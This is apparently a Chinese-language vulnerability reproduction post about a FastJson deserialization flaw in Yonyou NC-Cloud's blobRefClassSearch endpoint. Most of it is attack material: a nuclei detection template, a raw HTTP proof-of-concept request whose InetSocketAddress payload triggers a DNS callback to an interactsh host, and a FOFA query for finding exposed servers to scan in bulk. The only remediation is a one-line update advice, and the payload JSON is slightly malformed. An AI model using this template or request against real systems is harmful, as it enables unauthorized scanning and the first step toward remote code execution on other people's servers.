漏洞描述:
用友NC-Cloud /ncchr/pm/ref/indiIssued/blobRefClassSearch接口处存在FastJson反序列漏洞。攻击者可以构造恶意的JSON数据,在服务器上执行任意代码,从而控制整个服务器系统。
id: yongyou-NC-cloud-blobRefClassSearch-FastJson-RCEinfo: name: 用友NC-Cloud blobRefClassSea接口处存在FastJson反序列化漏洞 author: kingkong severity: high metadata: fofa-query: app="用友-NC-Cloud"http: - raw: - | POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 {"clientParam":"{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"{{interactsh-url}}"}}}"} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns"
FOFA:app="用友-NC-Cloud"
界面如下
漏洞检测POC
POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1Content-Type: application/jsonHost: Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Content-Length: 111{"clientParam":"{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"{{interactsh-url}}"}}}"}
neclei批量检测截图
更新当前系统或软件至最新版
原文始发于微信公众号(脚本小子):用友NC-Cloud接口blobRefClassSearch存在FastJson反序列化漏洞【漏洞复现|附nuclei-POC】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论